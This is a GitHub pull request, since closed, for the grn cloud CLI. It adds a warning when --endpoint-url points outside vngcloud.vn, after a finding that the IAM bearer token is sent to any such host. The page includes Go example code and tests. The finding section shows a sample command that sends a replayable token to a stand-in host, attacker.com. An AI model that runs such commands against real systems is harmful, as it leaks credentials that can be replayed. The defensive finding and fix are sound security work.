security(cli): warn on --endpoint-url outside trusted vngcloud.vn domain (SEC-08)#24

Closed
vks-team wants to merge 1 commit into
main from
security/sec-08-untrusted-endpoint-warning
Conversation

@vks-team vks-team commented Jul 1, 2026

Contributor

Finding (SEC-08)

grn authenticates against the real IAM (iamapis.vngcloud.vn, hardcoded) to mint a bearer token, then sends it with every request to whatever --endpoint-url names. --endpoint-url only changes the VKS/vServer base URL, not IAM — so:

grn vks list-clusters --endpoint-url http://attacker.com
→ Authorization: Bearer <real-token>   sent to attacker.com

The token is a plain bearer (not signed per-request like AWS SigV4), so a host that captures it can replay it against the real API until it expires. Worse combined with --no-verify-ssl (MITM). Confirmed in code:

  • internal/auth/token.go — IAM URL is hardcoded, unaffected by --endpoint-url.
  • internal/client/client.go — Authorization: Bearer set on every request to baseURL (= --endpoint-url).
  • No host allowlist or warning existed.

Fix (warn, don't block)

Add cli.IsTrustedEndpoint / cli.WarnIfUntrustedEndpoint and call them from the VKS and vServer client builders. When --endpoint-url resolves to a host outside *.vngcloud.vn, print a stderr warning that a replayable bearer token will be sent there. Does not block — legitimate custom/test endpoints still work (consistent with how aws permits --endpoint-url). Token scoping by host is a server-side concern and out of scope here.

Example:

Warning: --endpoint-url "attacker.com" is outside the trusted vngcloud.vn domain. grn will send your IAM bearer token to this host, and a bearer token can be replayed. Only use endpoints you trust.

Testing

  • TestIsTrustedEndpoint: empty/vngcloud.vn/*.vngcloud.vn trusted; attacker.com, evil.vngcloud.vn.attacker.com, localhost, malformed → untrusted.
  • Verified via binary: untrusted host warns, trusted host silent.
  • go vet ./... clean; full go test ./... passes; build clean.

🤖 Generated with Claude Code
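As an added example (not code from this PR or the grn project), here is a Go implementation of the IsTrustedEndpoint / WarnIfUntrustedEndpoint behaviour the description specifies, exercised against the cases its Testing section lists (empty, vngcloud.vn and *.vngcloud.vn trusted; attacker.com, evil.vngcloud.vn.attacker.com, localhost and malformed input untrusted). The trustedDomain constant, the io.Writer parameter on the warn function, and the treatment of scheme-less and trailing-dot input are assumptions made for the example:

```go
package main

import (
	"fmt"
	"io"
	"net/url"
	"os"
	"strings"
)

// trustedDomain is the domain the CLI is assumed to trust with the bearer
// token (value taken from the PR description; constant name is hypothetical).
const trustedDomain = "vngcloud.vn"

// IsTrustedEndpoint reports whether an --endpoint-url value names a host that
// is vngcloud.vn or a subdomain of it. An empty value means "use the default
// endpoint" and is trusted. Anything that does not parse to a usable host is
// untrusted, so the safe failure mode is to warn.
// Hypothetical implementation, not the project's own code.
func IsTrustedEndpoint(endpoint string) bool {
	endpoint = strings.TrimSpace(endpoint)
	if endpoint == "" {
		return true
	}
	// Accept scheme-less input ("attacker.com") by assuming https, so that
	// url.Parse treats the value as a host rather than as a path.
	if !strings.Contains(endpoint, "://") {
		endpoint = "https://" + endpoint
	}
	u, err := url.Parse(endpoint)
	if err != nil {
		return false // malformed input is never trusted
	}
	// Hostname() drops the port, IPv6 brackets and any user:pass@ prefix, so
	// "https://vngcloud.vn@attacker.com" resolves to attacker.com here.
	host := strings.ToLower(strings.TrimSuffix(u.Hostname(), "."))
	if host == "" {
		return false
	}
	// Exact match or a real subdomain: "evil.vngcloud.vn.attacker.com" ends in
	// ".attacker.com", not ".vngcloud.vn", so it fails this check.
	return host == trustedDomain || strings.HasSuffix(host, "."+trustedDomain)
}

// WarnIfUntrustedEndpoint writes the PR's warning text to w when the endpoint
// is outside the trusted domain. It returns true when a warning was written so
// callers and tests can observe the decision without capturing stderr.
func WarnIfUntrustedEndpoint(w io.Writer, endpoint string) bool {
	if IsTrustedEndpoint(endpoint) {
		return false
	}
	fmt.Fprintf(w, "Warning: --endpoint-url %q is outside the trusted %s domain. "+
		"grn will send your IAM bearer token to this host, and a bearer token can be replayed. "+
		"Only use endpoints you trust.\n", endpoint, trustedDomain)
	return true
}

func main() {
	// Constructed sample inputs covering the cases listed in the PR.
	samples := []string{
		"",
		"https://vks.vngcloud.vn",
		"http://attacker.com",
		"evil.vngcloud.vn.attacker.com",
		"localhost",
		"http://[::1", // malformed: missing closing bracket
	}
	for _, ep := range samples {
		warned := WarnIfUntrustedEndpoint(os.Stderr, ep)
		fmt.Printf("%-32q trusted=%v\n", ep, !warned)
	}
}
```

The check is deliberately on the parsed host name rather than on a substring of the raw string: a substring test for "vngcloud.vn" would accept evil.vngcloud.vn.attacker.com and userinfo-prefixed URLs, which is exactly the class of mistyped or lookalike host the warning exists to catch.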

…ain (SEC-08)

grn authenticates against the real IAM and sends the resulting reusable bearer
token to whatever host --endpoint-url names — so a mistyped or malicious host
captures a token it can replay against the real API. Unlike AWS SigV4 (signed
per request/host), this bearer is replayable.

Add cli.IsTrustedEndpoint / WarnIfUntrustedEndpoint and call it from the VKS and
vServer client builders: when --endpoint-url resolves to a host outside
*.vngcloud.vn, print a stderr warning that a bearer token will be sent there.
Warns only; does not block (custom/test endpoints still work).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@vks-team vks-team closed this Jul 1, 2026
@vks-team vks-team deleted the security/sec-08-untrusted-endpoint-warning branch July 1, 2026 16:26